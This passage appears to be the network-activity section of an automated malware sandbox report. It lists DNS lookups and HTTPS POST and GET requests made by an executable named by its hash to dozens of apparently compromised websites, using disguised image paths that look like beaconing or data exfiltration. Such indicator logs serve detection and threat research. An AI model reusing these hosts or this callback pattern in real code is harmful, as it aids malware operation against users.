      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Host: olejuulsmuskelterapi.dk
      Response
      HTTP/1.1 404 Not Found
      Connection: close
      x-litespeed-vary: cookie=np_wc_currency,cookie=np_wc_currency_language,cookie=_icl_current_language, value=nitrodesktop
      x-litespeed-tag: uri=0341c57ac0cc2ff4dbebc0795dc4de54
      x-litespeed-cache-control: no-cache
      content-type: text/html; charset=UTF-8
      x-nitro-cache: MISS
      x-nitro-disabled-reason: 404
      x-nitro-disabled: 1
      set-cookie: PHPSESSID=e04af50372d90d009ddf82bc239b92eb; path=/; secure; HttpOnly
      expires: Thu, 19 Nov 1981 08:52:00 GMT
      cache-control: no-store, no-cache, must-revalidate
      pragma: no-cache
      link: <https://olejuulsmuskelterapi.dk/wp-json/>; rel="https://api.w.org/"
      transfer-encoding: chunked
      date: Tue, 02 Apr 2024 13:56:16 GMT
      server: LiteSpeed
      x-nf-server: Yes
      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
    • flag-us
      DNS
      24.106.231.94.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      24.106.231.94.in-addr.arpa
      IN PTR
      Response
      24.106.231.94.in-addr.arpa
      IN PTR
      linux202.curanet.dk
    • flag-us
      DNS
      24.106.231.94.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      24.106.231.94.in-addr.arpa
      IN PTR
      Response
      24.106.231.94.in-addr.arpa
      IN PTR
      linux202.curanet.dk
    • flag-us
      DNS
      131.41.21.185.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      131.41.21.185.in-addr.arpa
      IN PTR
      Response
      131.41.21.185.in-addr.arpa
      IN PTR
      linux23.curanet.dk
    • flag-us
      DNS
      131.41.21.185.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      131.41.21.185.in-addr.arpa
      IN PTR
      Response
      131.41.21.185.in-addr.arpa
      IN PTR
      linux23.curanet.dk
    • flag-us
      DNS
      vyhino-zhulebino-24.ru
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      vyhino-zhulebino-24.ru
      IN A
      Response
    • flag-us
      DNS
      torgbodenbollnas.se
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      torgbodenbollnas.se
      IN A
      Response
      torgbodenbollnas.se
      IN A
      46.30.211.38
    • flag-us
      DNS
      torgbodenbollnas.se
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      torgbodenbollnas.se
      IN A
      Response
      torgbodenbollnas.se
      IN A
      46.30.211.38
    • flag-us
      DNS
      ora-it.de
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      ora-it.de
      IN A
      Response
      ora-it.de
      IN A
      176.28.10.103
    • flag-fr
      POST
      https://ora-it.de/include/pictures/jszmzy.png
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      176.28.10.103:443
      Request
      POST /include/pictures/jszmzy.png HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: ora-it.de
      Response
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Tue, 02 Apr 2024 13:56:18 GMT
      Content-Type: text/html
      Content-Length: 162
      Connection: close
      Location: https://www.ora-it.de/include/pictures/jszmzy.png
    • flag-us
      DNS
      www.ora-it.de
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      www.ora-it.de
      IN A
      Response
      www.ora-it.de
      IN CNAME
      ora-it.de
      ora-it.de
      IN A
      176.28.10.103
    • flag-us
      DNS
      www.ora-it.de
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      www.ora-it.de
      IN A
      Response
      www.ora-it.de
      IN CNAME
      ora-it.de
      ora-it.de
      IN A
      176.28.10.103
    • flag-us
      DNS
      38.211.30.46.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      38.211.30.46.in-addr.arpa
      IN PTR
      Response
      38.211.30.46.in-addr.arpa
      IN PTR
      domain-parkingonecom
    • flag-us
      DNS
      103.10.28.176.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      103.10.28.176.in-addr.arpa
      IN PTR
      Response
      103.10.28.176.in-addr.arpa
      IN PTR
      server06ora-itde
    • flag-us
      DNS
      103.10.28.176.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      103.10.28.176.in-addr.arpa
      IN PTR
      Response
      103.10.28.176.in-addr.arpa
      IN PTR
      server06ora-itde
    • flag-fr
      GET
      https://www.ora-it.de/include/pictures/jszmzy.png
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      176.28.10.103:443
      Request
      GET /include/pictures/jszmzy.png HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Host: www.ora-it.de
      Response
      HTTP/1.1 404 Not Found
      Server: nginx
      Date: Tue, 02 Apr 2024 13:56:21 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      X-Powered-By: PHP/8.0.30
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      Link: <https://www.ora-it.de/wp-json/>; rel="https://api.w.org/"
    • flag-us
      DNS
      digi-talents.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      digi-talents.com
      IN A
      Response
      digi-talents.com
      IN A
      46.226.40.217
    • flag-us
      DNS
      digi-talents.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      digi-talents.com
      IN A
      Response
      digi-talents.com
      IN A
      46.226.40.217
    • flag-es
      POST
      https://digi-talents.com/content/temp/ojkfitax.png
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      46.226.40.217:443
      Request
      POST /content/temp/ojkfitax.png HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: digi-talents.com
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 02 Apr 2024 12:59:56 GMT
      Server: Apache/2.4.10 (Debian)
      Set-Cookie: PHPSESSID=utcb8b2horubub4dn0fbvjr7t7; path=/
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      Pragma: no-cache
      Link: <https://digi-talents.com/wp-json/>; rel="https://api.w.org/"
      Connection: close
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=UTF-8
    • flag-us
      DNS
      chandlerpd.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      chandlerpd.com
      IN A
      Response
      chandlerpd.com
      IN A
      216.40.34.41
    • flag-us
      DNS
      chandlerpd.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      chandlerpd.com
      IN A
      Response
      chandlerpd.com
      IN A
      216.40.34.41
    • flag-us
      DNS
      217.40.226.46.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      217.40.226.46.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      217.40.226.46.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      217.40.226.46.in-addr.arpa
      IN PTR
      Response
    • 176.52.247.15:443
      https://mank.de/static/images/ueijdxnirivp.gif
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.1kB
      5.0kB
      11
      14

      HTTP Request

      POST https://mank.de/static/images/ueijdxnirivp.gif

      HTTP Response

      301
    • 176.52.247.15:443
      https://www.mank.de/static/images/ueijdxnirivp.gif
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      1.2kB
      19.6kB
      14
      20

      HTTP Request

      GET https://www.mank.de/static/images/ueijdxnirivp.gif

      HTTP Response

      404
    • 217.160.0.10:443
      https://work2live.de/uploads/pictures/ta.png
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      1.9kB
      4.3kB
      8
      9

      HTTP Request

      POST https://work2live.de/uploads/pictures/ta.png
    • 159.69.83.114:443
      https://triggi.de/news/image/pmltlc.gif
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      3.1kB
      48.4kB
      34
      40

      HTTP Request

      POST https://triggi.de/news/image/pmltlc.gif

      HTTP Response

      404
    • 18.197.248.23:443
      https://innote.fi/uploads/image/ht.jpg
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.0kB
      4.6kB
      10
      13

      HTTP Request

      POST https://innote.fi/uploads/image/ht.jpg

      HTTP Response

      403
    • 82.212.215.131:443
      https://iwelt.de/news/assets/ksry.jpg
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.1kB
      5.4kB
      11
      11

      HTTP Request

      POST https://iwelt.de/news/assets/ksry.jpg

      HTTP Response

      301
    • 82.212.215.131:443
      https://www.iwelt.de/news/assets/ksry.jpg
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      1.0kB
      5.3kB
      10
      10

      HTTP Request

      GET https://www.iwelt.de/news/assets/ksry.jpg

      HTTP Response

      200
    • 74.220.199.6:443
      mdacares.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      260 B
      200 B
      5
      5
    • 141.193.213.10:443
      https://celularity.com/uploads/graphic/xqkkog.jpg
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.1kB
      6.7kB
      11
      12

      HTTP Request

      POST https://celularity.com/uploads/graphic/xqkkog.jpg

      HTTP Response

      404
    • 185.38.248.97:443
      https://wychowanieprzedszkolne.pl/data/images/utbnsp.gif
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.2kB
      5.0kB
      12
      12

      HTTP Request

      POST https://wychowanieprzedszkolne.pl/data/images/utbnsp.gif

      HTTP Response

      404
    • 5.35.226.24:443
      https://bildungsunderlebnis.haus/include/tmp/rguxep.gif
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.0kB
      6.3kB
      10
      12

      HTTP Request

      POST https://bildungsunderlebnis.haus/include/tmp/rguxep.gif

      HTTP Response

      404
    • 81.181.102.24:443
      urmasiimariiuniri.ro
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      260 B
      5
    • 3.33.130.190:443
      https://devlaur.com/data/pics/or.gif
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.2kB
      4.9kB
      13
      16

      HTTP Request

      POST https://devlaur.com/data/pics/or.gif

      HTTP Response

      405
    • 212.83.139.44:443
      https://philippedebroca.com/admin/image/ppwfmo.jpg
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.1kB
      5.9kB
      12
      15

      HTTP Request

      POST https://philippedebroca.com/admin/image/ppwfmo.jpg

      HTTP Response

      301
    • 212.83.139.44:443
      https://www.philippedebroca.fr/admin/image/ppwfmo.jpg
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.9kB
      86.8kB
      51
      67

      HTTP Request

      GET https://www.philippedebroca.fr/admin/image/ppwfmo.jpg

      HTTP Response

      404
    • 51.75.34.224:443
      https://kaminscy.com/uploads/images/xvrcakvaetjk.gif
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.1kB
      9.3kB
      12
      17

      HTTP Request

      POST https://kaminscy.com/uploads/images/xvrcakvaetjk.gif

      HTTP Response

      301
    • 51.75.34.224:443
      https://www.kaminscy.com/uploads/images/xvrcakvaetjk.gif
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      1.1kB
      6.0kB
      11
      14

      HTTP Request

      GET https://www.kaminscy.com/uploads/images/xvrcakvaetjk.gif

      HTTP Response

      404
    • 91.239.233.22:443
      https://webcodingstudio.com/uploads/tmp/zplemxvx.png
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.6kB
      42.4kB
      23
      36

      HTTP Request

      POST https://webcodingstudio.com/uploads/tmp/zplemxvx.png

      HTTP Response

      404
    • 208.100.26.245:443
      https://onlybacklink.com/news/tmp/wcytkdtb.png
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.1kB
      5.9kB
      11
      12

      HTTP Request

      POST https://onlybacklink.com/news/tmp/wcytkdtb.png

      HTTP Response

      404
    • 35.177.75.40:443
      https://victoriousfestival.co.uk/include/graphic/wcfo.gif
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.1kB
      4.3kB
      10
      13

      HTTP Request

      POST https://victoriousfestival.co.uk/include/graphic/wcfo.gif

      HTTP Response

      301
    • 35.177.75.40:443
      https://www.victoriousfestival.co.uk/include/graphic/wcfo.gif
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      3.2kB
      96.3kB
      58
      73

      HTTP Request

      GET https://www.victoriousfestival.co.uk/include/graphic/wcfo.gif

      HTTP Response

      404
    • 188.114.96.2:443
      https://levdittliv.se/content/tmp/twxa.jpg
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.1kB
      6.2kB
      12
      12

      HTTP Request

      POST https://levdittliv.se/content/tmp/twxa.jpg

      HTTP Response

      301
    • 172.67.75.185:443
      https://fitforme.com/sv-se/vara-multivitaminer/
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      3.5kB
      139.6kB
      63
      119

      HTTP Request

      GET https://fitforme.com/sv-se/vara-multivitaminer/

      HTTP Response

      200
    • 35.215.118.92:443
      https://rosavalamedahr.com/static/tmp/dwms.png
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      3.4kB
      56.5kB
      39
      45

      HTTP Request

      POST https://rosavalamedahr.com/static/tmp/dwms.png

      HTTP Response

      404
    • 70.40.220.182:443
      https://dupontsellshomes.com/data/pictures/agzfktulhq.jpg
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.1kB
      6.3kB
      12
      12

      HTTP Request

      POST https://dupontsellshomes.com/data/pictures/agzfktulhq.jpg

      HTTP Response

      404
    • 104.21.95.31:443
      https://braffinjurylawfirm.com/uploads/pics/ulgz.png
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.1kB
      6.7kB
      12
      12

      HTTP Request

      POST https://braffinjurylawfirm.com/uploads/pics/ulgz.png

      HTTP Response

      302
    • 104.21.95.31:443
      https://braffinjurylawfirm.com/
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.5kB
      70.5kB
      39
      68

      HTTP Request

      GET https://braffinjurylawfirm.com/

      HTTP Response

      200
    • 35.190.31.54:443
      https://xtptrack.com/data/pictures/pugigjqlcx.jpg
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.1kB
      4.3kB
      10
      12

      HTTP Request

      POST https://xtptrack.com/data/pictures/pugigjqlcx.jpg

      HTTP Response

      301
    • 34.120.190.48:443
      https://www.xtptrack.com/data/pictures/pugigjqlcx.jpg
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      1.1kB
      9.7kB
      10
      13

      HTTP Request

      GET https://www.xtptrack.com/data/pictures/pugigjqlcx.jpg

      HTTP Response

      404
    • 213.186.33.4:443
      https://alsace-first.com/content/images/tgwk.gif
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.9kB
      39.6kB
      30
      34

      HTTP Request

      POST https://alsace-first.com/content/images/tgwk.gif

      HTTP Response

      404
    • 208.95.242.12:443
      https://woodleyacademy.org/uploads/temp/kzkszsprcr.gif
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.2kB
      9.3kB
      13
      17

      HTTP Request

      POST https://woodleyacademy.org/uploads/temp/kzkszsprcr.gif

      HTTP Response

      404
    • 94.231.106.24:443
      https://sportsmassoren.com/content/pics/zixrzirane.gif
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.1kB
      5.5kB
      10
      12

      HTTP Request

      POST https://sportsmassoren.com/content/pics/zixrzirane.gif

      HTTP Response

      301
    • 185.21.41.131:443
      https://olejuulsmuskelterapi.dk/content/pics/zixrzirane.gif
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      1.9kB
      40.4kB
      29
      33

      HTTP Request

      GET https://olejuulsmuskelterapi.dk/content/pics/zixrzirane.gif

      HTTP Response

      404
    • 46.30.211.38:443
      torgbodenbollnas.se
      tls
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      641 B
      5.5kB
      8
      9
    • 176.28.10.103:443
      https://ora-it.de/include/pictures/jszmzy.png
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.1kB
      4.1kB
      11
      11

      HTTP Request

      POST https://ora-it.de/include/pictures/jszmzy.png

      HTTP Response

      301
    • 176.28.10.103:443
      https://www.ora-it.de/include/pictures/jszmzy.png
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.3kB
      59.4kB
      39
      47

      HTTP Request

      GET https://www.ora-it.de/include/pictures/jszmzy.png

      HTTP Response

      404
    • 46.226.40.217:443
      https://digi-talents.com/content/temp/ojkfitax.png
      tls, http
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      2.7kB
      30.4kB
      23
      27

      HTTP Request

      POST https://digi-talents.com/content/temp/ojkfitax.png

      HTTP Response

      404
    • 216.40.34.41:443
      chandlerpd.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      208 B
      4
    • 8.8.8.8:53
      183.142.211.20.in-addr.arpa
      dns
      73 B
      159 B
      1
      1

      DNS Request

      183.142.211.20.in-addr.arpa

    • 8.8.8.8:53
      218.135.221.88.in-addr.arpa
      dns
      73 B
      139 B
      1
      1

      DNS Request

      218.135.221.88.in-addr.arpa

    • 8.8.8.8:53
      5.181.190.20.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      5.181.190.20.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      196.249.167.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      196.249.167.52.in-addr.arpa

    • 8.8.8.8:53
      104.219.191.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      104.219.191.52.in-addr.arpa

    • 8.8.8.8:53
      81.171.91.138.in-addr.arpa
      dns
      72 B
      146 B
      1
      1

      DNS Request

      81.171.91.138.in-addr.arpa

    • 8.8.8.8:53
      86.23.85.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      86.23.85.13.in-addr.arpa

    • 8.8.8.8:53
      18.31.95.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      18.31.95.13.in-addr.arpa

    • 8.8.8.8:53
      35.34.16.2.in-addr.arpa
      dns
      69 B
      131 B
      1
      1

      DNS Request

      35.34.16.2.in-addr.arpa

    • 8.8.8.8:53
      mank.de
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      53 B
      69 B
      1
      1

      DNS Request

      mank.de

      DNS Response

      176.52.247.15

    • 8.8.8.8:53
      www.mank.de
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      57 B
      87 B
      1
      1

      DNS Request

      www.mank.de

      DNS Response

      176.52.247.15

    • 8.8.8.8:53
      15.247.52.176.in-addr.arpa
      dns
      72 B
      146 B
      1
      1

      DNS Request

      15.247.52.176.in-addr.arpa

    • 8.8.8.8:53
      work2live.de
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      58 B
      74 B
      1
      1

      DNS Request

      work2live.de

      DNS Response

      217.160.0.10

    • 8.8.8.8:53
      10.0.160.217.in-addr.arpa
      dns
      71 B
      118 B
      1
      1

      DNS Request

      10.0.160.217.in-addr.arpa

    • 8.8.8.8:53
      240.221.184.93.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      240.221.184.93.in-addr.arpa

    • 8.8.8.8:53
      triggi.de
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      55 B
      71 B
      1
      1

      DNS Request

      triggi.de

      DNS Response

      159.69.83.114

    • 8.8.8.8:53
      innote.fi
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      55 B
      87 B
      1
      1

      DNS Request

      innote.fi

      DNS Response

      18.197.248.23
      52.59.120.70

    • 8.8.8.8:53
      iwelt.de
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      54 B
      70 B
      1
      1

      DNS Request

      iwelt.de

      DNS Response

      82.212.215.131

    • 8.8.8.8:53
      www.iwelt.de
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      58 B
      74 B
      1
      1

      DNS Request

      www.iwelt.de

      DNS Response

      82.212.215.131

    • 8.8.8.8:53
      114.83.69.159.in-addr.arpa
      dns
      72 B
      106 B
      1
      1

      DNS Request

      114.83.69.159.in-addr.arpa

    • 8.8.8.8:53
      23.248.197.18.in-addr.arpa
      dns
      72 B
      117 B
      1
      1

      DNS Request

      23.248.197.18.in-addr.arpa

    • 8.8.8.8:53
      131.215.212.82.in-addr.arpa
      dns
      73 B
      105 B
      1
      1

      DNS Request

      131.215.212.82.in-addr.arpa

    • 8.8.8.8:53
      mdacares.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      58 B
      74 B
      1
      1

      DNS Request

      mdacares.com

      DNS Response

      74.220.199.6

    • 8.8.8.8:53
      celularity.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      60 B
      92 B
      1
      1

      DNS Request

      celularity.com

      DNS Response

      141.193.213.10
      141.193.213.11

    • 8.8.8.8:53
      wychowanieprzedszkolne.pl
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      71 B
      87 B
      1
      1

      DNS Request

      wychowanieprzedszkolne.pl

      DNS Response

      185.38.248.97

    • 8.8.8.8:53
      bildungsunderlebnis.haus
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      70 B
      86 B
      1
      1

      DNS Request

      bildungsunderlebnis.haus

      DNS Response

      5.35.226.24

    • 8.8.8.8:53
      10.213.193.141.in-addr.arpa
      dns
      73 B
      133 B
      1
      1

      DNS Request

      10.213.193.141.in-addr.arpa

    • 8.8.8.8:53
      urmasiimariiuniri.ro
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      132 B
      164 B
      2
      2

      DNS Request

      urmasiimariiuniri.ro

      DNS Request

      urmasiimariiuniri.ro

      DNS Response

      81.181.102.24

      DNS Response

      81.181.102.24

    • 8.8.8.8:53
      97.248.38.185.in-addr.arpa
      dns
      144 B
      216 B
      2
      2

      DNS Request

      97.248.38.185.in-addr.arpa

      DNS Request

      97.248.38.185.in-addr.arpa

    • 8.8.8.8:53
      23.236.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      23.236.111.52.in-addr.arpa

    • 8.8.8.8:53
      24.226.35.5.in-addr.arpa
      dns
      70 B
      111 B
      1
      1

      DNS Request

      24.226.35.5.in-addr.arpa

    • 8.8.8.8:53
      devlaur.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      57 B
      89 B
      1
      1

      DNS Request

      devlaur.com

      DNS Response

      3.33.130.190
      15.197.148.33

    • 8.8.8.8:53
      philippedebroca.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      65 B
      81 B
      1
      1

      DNS Request

      philippedebroca.com

      DNS Response

      212.83.139.44

    • 8.8.8.8:53
      190.130.33.3.in-addr.arpa
      dns
      71 B
      127 B
      1
      1

      DNS Request

      190.130.33.3.in-addr.arpa

    • 8.8.8.8:53
      www.philippedebroca.fr
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      68 B
      98 B
      1
      1

      DNS Request

      www.philippedebroca.fr

      DNS Response

      212.83.139.44

    • 8.8.8.8:53
      44.139.83.212.in-addr.arpa
      dns
      72 B
      119 B
      1
      1

      DNS Request

      44.139.83.212.in-addr.arpa

    • 8.8.8.8:53
      kaminscy.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      58 B
      74 B
      1
      1

      DNS Request

      kaminscy.com

      DNS Response

      51.75.34.224

    • 8.8.8.8:53
      www.kaminscy.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      124 B
      184 B
      2
      2

      DNS Request

      www.kaminscy.com

      DNS Request

      www.kaminscy.com

      DNS Response

      51.75.34.224

      DNS Response

      51.75.34.224

    • 8.8.8.8:53
      224.34.75.51.in-addr.arpa
      dns
      71 B
      94 B
      1
      1

      DNS Request

      224.34.75.51.in-addr.arpa

    • 8.8.8.8:53
      boompinoy.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      59 B
      132 B
      1
      1

      DNS Request

      boompinoy.com

    • 8.8.8.8:53
      webcodingstudio.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      130 B
      162 B
      2
      2

      DNS Request

      webcodingstudio.com

      DNS Request

      webcodingstudio.com

      DNS Response

      91.239.233.22

      DNS Response

      91.239.233.22

    • 8.8.8.8:53
      22.233.239.91.in-addr.arpa
      dns
      72 B
      105 B
      1
      1

      DNS Request

      22.233.239.91.in-addr.arpa

    • 8.8.8.8:53
      onlybacklink.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      124 B
      156 B
      2
      2

      DNS Request

      onlybacklink.com

      DNS Request

      onlybacklink.com

      DNS Response

      208.100.26.245

      DNS Response

      208.100.26.245

    • 8.8.8.8:53
      victoriousfestival.co.uk
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      70 B
      86 B
      1
      1

      DNS Request

      victoriousfestival.co.uk

      DNS Response

      35.177.75.40

    • 8.8.8.8:53
      www.victoriousfestival.co.uk
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      74 B
      90 B
      1
      1

      DNS Request

      www.victoriousfestival.co.uk

      DNS Response

      35.177.75.40

    • 8.8.8.8:53
      40.75.177.35.in-addr.arpa
      dns
      142 B
      266 B
      2
      2

      DNS Request

      40.75.177.35.in-addr.arpa

      DNS Request

      40.75.177.35.in-addr.arpa

    • 8.8.8.8:53
      245.26.100.208.in-addr.arpa
      dns
      73 B
      127 B
      1
      1

      DNS Request

      245.26.100.208.in-addr.arpa

    • 8.8.8.8:53
      levdittliv.se
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      59 B
      91 B
      1
      1

      DNS Request

      levdittliv.se

      DNS Response

      188.114.96.2
      188.114.97.2

    • 8.8.8.8:53
      fitforme.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      58 B
      106 B
      1
      1

      DNS Request

      fitforme.com

      DNS Response

      172.67.75.185
      104.26.9.199
      104.26.8.199

    • 8.8.8.8:53
      2.96.114.188.in-addr.arpa
      dns
      71 B
      133 B
      1
      1

      DNS Request

      2.96.114.188.in-addr.arpa

    • 8.8.8.8:53
      rosavalamedahr.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      64 B
      80 B
      1
      1

      DNS Request

      rosavalamedahr.com

      DNS Response

      35.215.118.92

